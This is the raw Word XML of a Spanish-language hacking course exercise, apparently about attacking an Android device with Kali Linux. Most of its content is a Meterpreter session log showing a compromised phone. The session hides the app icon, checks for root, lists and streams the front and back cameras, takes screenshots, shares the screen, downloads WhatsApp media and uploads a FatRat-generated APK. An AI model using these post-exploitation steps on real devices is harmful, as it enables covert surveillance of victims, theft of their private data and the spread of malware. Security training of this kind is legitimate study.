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327DF" w14:textId="6C83B7DB" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:permStart w:id="892481783" w:edGrp="everyone"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75E85393" wp14:editId="0F62BA3A">
                <wp:extent cx="5734050" cy="1295400"/>
                <wp:effectExtent l="0" t="0" r="0" b="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53780" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                            <w:pPr>
                              <w:jc w:val="center"/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556930820" w:edGrp="everyone"/>
                            <w:r w:rsidRPr="0032529E"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rso hacking a Dispositivo con Kali Linux </w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="11EF328C" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                            <w:pPr>
                              <w:jc w:val="center"/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29E"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axion</w:t>
                            </w:r>
                            <w:permEnd w:id="5569308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E8539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451.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" filled="f" stroked="f">
                <v:fill o:detectmouseclick="t"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7DC53780" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                      <w:pPr>
                        <w:jc w:val="center"/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ermStart w:id="556930820" w:edGrp="everyone"/>
                      <w:r w:rsidRPr="0032529E"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rso hacking a Dispositivo con Kali Linux </w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="11EF328C" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="0032529E" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
                      <w:pPr>
                        <w:jc w:val="center"/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29E"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putaxion</w:t>
                      </w:r>
                      <w:permEnd w:id="556930820"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:anchorlock/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:permEnd w:id="892481783"/>
    </w:p>
    <w:p w14:paraId="2BED8282" w14:textId="4364132C" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51B48FAA" w14:textId="77777777" w:rsidR="00BF72A6" w:rsidRDefault="009A65A0">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="es-AR"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0FF9F0C3" wp14:editId="02962683">
            <wp:extent cx="6067425" cy="582917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ax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34" cy="58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4FD1" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0"/>
    <w:p w14:paraId="5BE0F179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ifconfig</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9C9E60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ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1674A68A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>No entries exist in /data/data/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>com.metasploit.stage</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/files</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1425B18F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help</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051981FC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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hide_app_icon</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9C5B84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 xml:space="preserve">[*] Activity </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MainActivity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> was hidden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6FAEEC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lastRenderedPageBreak/>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>check_root</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A9650A7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>[+] Device is rooted</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A0E3FF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ps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E57727F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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webcam_list</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD04935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>1: Back Camera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50952C47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>2: Front Camera</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D07836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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webcam_stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -h</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A06FFB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>[*] Starting...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF4CB26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 xml:space="preserve">Usage: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>webcam_stream</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [options]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2237E9" w14:textId="77777777" w:rsidR="005433ED" w:rsidRPr="005433ED" w:rsidRDefault="005433ED" w:rsidP="005433ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77C7CDF1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>Stream from the specified webcam.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473490C2" w14:textId="77777777" w:rsidR="005433ED" w:rsidRPr="005433ED" w:rsidRDefault="005433ED" w:rsidP="005433ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A24635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>OPTIONS:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6C3006" w14:textId="77777777" w:rsidR="005433ED" w:rsidRPr="005433ED" w:rsidRDefault="005433ED" w:rsidP="005433ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="037B4F0B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 xml:space="preserve">    -d &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stream duration in seconds (Default: 1800)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C940BF3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 xml:space="preserve">    -h        Help Banner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469B3089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 xml:space="preserve">    -i &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> index of the webcam to use (Default: 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA1C7A5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 xml:space="preserve">    -q &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stream quality (Default: '50')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B74D08B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 xml:space="preserve">    -s &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stream file path (Default: 'jGydyHSJ.jpeg')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B7148E7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 xml:space="preserve">    -t &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  The</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> stream player path (Default: kQhVKsPY.html)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140688AF" w14:textId="77777777" w:rsidR="005433ED" w:rsidRPr="005433ED" w:rsidRDefault="005433ED" w:rsidP="005433ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">    -v &lt;opt</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&gt;  Automatically</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> view the stream (Default: 'true')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B64EFB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screenshot </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4200CFDF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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>screenshare</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34336BF0" w14:textId="77777777" w:rsidR="005433ED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download /storage/emulated/legacy/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Whatsapp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/Media</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FEAE44" w14:textId="33C0AC6E" w:rsidR="009A65A0" w:rsidRPr="005433ED" w:rsidRDefault="005433ED" w:rsidP="005433ED">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; upload /root/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Fatrat_Generated</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005433ED">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>mega.apk</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="30705560" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="005433ED" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:commentReference w:id="1"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="60880237" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRPr="005433ED" w:rsidRDefault="009A65A0" w:rsidP="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Ttulo3"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="009A65A0" w:rsidRPr="005433ED" w:rsidSect="009E6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0-01-28T23:41:00Z" w:initials="U">
    <w:p w14:paraId="7865A683" w14:textId="77777777" w:rsidR="009A65A0" w:rsidRDefault="009A65A0">
      <w:pPr>
        <w:pStyle w:val="Textocomentario"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Refdecomentario"/>
        </w:rPr>
        <w:annotationRef/>
      </w:r>
      <w:r w:rsidR="009E6905">
        <w:t xml:space="preserve">Pablo Ezequiel </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009E6905">
        <w:t>Cordob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65A683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A0"/>
    <w:rsid w:val="001B0578"/>
    <w:rsid w:val="00226754"/>
    <w:rsid w:val="0032529E"/>
    <w:rsid w:val="005433ED"/>
    <w:rsid w:val="009A65A0"/>
    <w:rsid w:val="009E6905"/>
    <w:rsid w:val="00A13917"/>
    <w:rsid w:val="00B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C596"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0FE223E6-DC51-4EAB-9338-586ABEAD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6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9A65A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9A6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6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65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6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5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5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5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5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AB17-A060-4710-8566-67656D4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9T03:38:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-01-29T03:38:00Z</dcterms:modified>
</cp:coreProperties>
</file>